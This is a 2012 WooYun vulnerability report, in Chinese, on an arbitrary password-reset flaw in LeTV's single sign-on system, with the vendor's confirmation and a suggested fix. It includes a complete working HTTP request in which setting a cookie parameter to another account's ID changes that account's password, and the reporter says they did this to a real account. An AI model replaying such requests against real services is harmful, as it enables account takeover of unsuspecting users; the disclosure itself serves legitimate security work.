当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-012443

漏洞标题:乐视网单点登陆系统任意用户密码修改

相关厂商:乐视网

漏洞作者: only_guest

提交时间:2012-09-20 10:16

修复时间:2012-11-04 10:17

公开时间:2012-11-04 10:17

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-09-20: 细节已通知厂商并且等待厂商处理中
2012-09-20: 厂商已经确认,细节仅向厂商公开
2012-09-30: 细节向核心白帽子及相关领域专家公开
2012-10-10: 细节向普通白帽子公开
2012-10-20: 细节向实习白帽子公开
2012-11-04: 细节向公众公开

简要描述:

不需要爆破了,所有帐号都可直接修改.有帐号就行.这个单点登陆系统影响了整个站点啊.

详细说明:

本来想明天整理好了写的详细点再发的.很多人发.我也直接发了吧.你们一次性修了吧.

POST /shop/user.php HTTP/1.1
Host: hdtv.letv.com
Proxy-Connection: keep-alive
Content-Length: 85
Cache-Control: max-age=0
Origin: http://hdtv.letv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1163.0 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://hdtv.letv.com/shop/user.php?act=profile
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie:   casflag=1; m=123456; 
new_password=zzzzzz&comfirm_password=zzzzzz&act=act_edit_password&submit=%B1%A3%B4%E6


看以上请求.只要修改cookies里的M这个参数.就可以直接修改了.
您的新密码已设置成功.......
随便改了123456这个帐号的密码.请帮他重置吧..

漏洞证明:

您的新密码已设置成功

修复方案:

加上原密码认证吧.

版权声明:转载请注明来源 only_guest@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-09-20 11:22

厂商回复:

感谢挖掘,说实话,很土的问题,说明我们在老系统架构的梳理上做的还不够。感谢挖掘。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-09-20 11:15 | 夜虫儿 ( 实习白帽子 | Rank:36 漏洞数:4 | ^_^)

    修改的只是单点登录的密码吧,貌似很多单点登录系统都这样,给它一个密码,它就把原先保存的给替换了